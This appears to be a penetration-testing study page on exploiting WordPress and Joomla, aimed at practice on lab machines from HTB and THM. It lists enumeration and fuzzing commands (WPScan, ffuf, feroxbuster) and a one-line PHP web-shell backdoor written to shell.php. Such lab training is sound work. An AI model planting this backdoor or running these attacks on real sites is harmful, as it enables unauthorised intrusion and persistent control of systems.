CMS Exploitation (WordPress, Joomla): practice machines and key commands
Content management systems and common platforms are popular targets because they are widely deployed and often outdated. Identify the product and version from headers, generator tags and static file paths, then enumerate plugins, themes and users. WPScan covers WordPress, and similar scanners exist for Joomla and Drupal. A vulnerable plugin can give file read, SQL injection or upload, while an admin login lets you edit a theme or install a plugin containing a web shell. Weak or default passwords on admin panels, Jenkins script consoles and monitoring tools such as Splunk are a frequent shortcut. Check configuration files for database credentials once you have a foothold. These machines run recognisable software with exploitable weaknesses. Always back up what you change in an admin panel and remove the shell afterwards.
Key commands
Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.
WPScan WordPress Enumeration & Attack
Enumerate vulnerable plugins, themes, and usernames on WordPress sites.
wpscan --url http://{TARGET_IP}/ --enumerate ap,at,u,cb --plugins-detection aggressiveffuf Directory & Endpoint Fuzzing
High-speed directory enumeration with auto-calibrated filtering and extension recursion.
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://{TARGET_IP}/FUZZ -e .php,.html,.txt,.bak,.js -ac -mc 200,301,302,403Feroxbuster Recursive Crawl & Fuzz
Deep Rust recursive crawler with smart 404 detection and auto-extract.
feroxbuster -u http://{TARGET_IP}/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,asp,aspx,jsp -d 2Minimal PHP Single-Line Backdoor
Lightweight PHP command execution backdoor for quick web root persistence.
echo '<?php system($_GET["cmd"]); ?>' > shell.php
Keep going
- Methodology: Phase 03: Vulnerability Identification & Threat Modeling
- Cheatsheet: Web & Directory Fuzzing
CMS Exploitation (WordPress, Joomla) machines (17)
3 of these are machines I solved myself and are listed first within each difficulty. Machines are matched by their technique tags. 14 Linux, 3 Windows.
Very Easy (2)
| Machine | Platform | OS |
|---|---|---|
| Ignition | HTB | Linux |
| Pennyworth | HTB | Linux |
Easy (2)
| Machine | Platform | OS |
|---|---|---|
| Alfred | THM | Windows |
| Armageddon | HTB | Linux |
Medium (8)
| Machine | Platform | OS |
|---|---|---|
| Mr Robot CTF | THM | Linux |
| Benign | THM | Linux |
| Boiler CTF | THM | Linux |
| Hawk | HTB | Linux |
| Investigating with Splunk | THM | Linux |
| PS Eclipse | THM | Linux |
| Runner | HTB | Linux |
| Smol | THM | Linux |
Hard (5)
| Machine | Platform | OS |
|---|---|---|
| Daily Bugle | THM | Linux |
| Internal | THM | Linux |
| Object | HTB | Windows |
| Retro | THM | Windows |
| VulnNet: Internal | THM | Linux |
Related techniques
Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox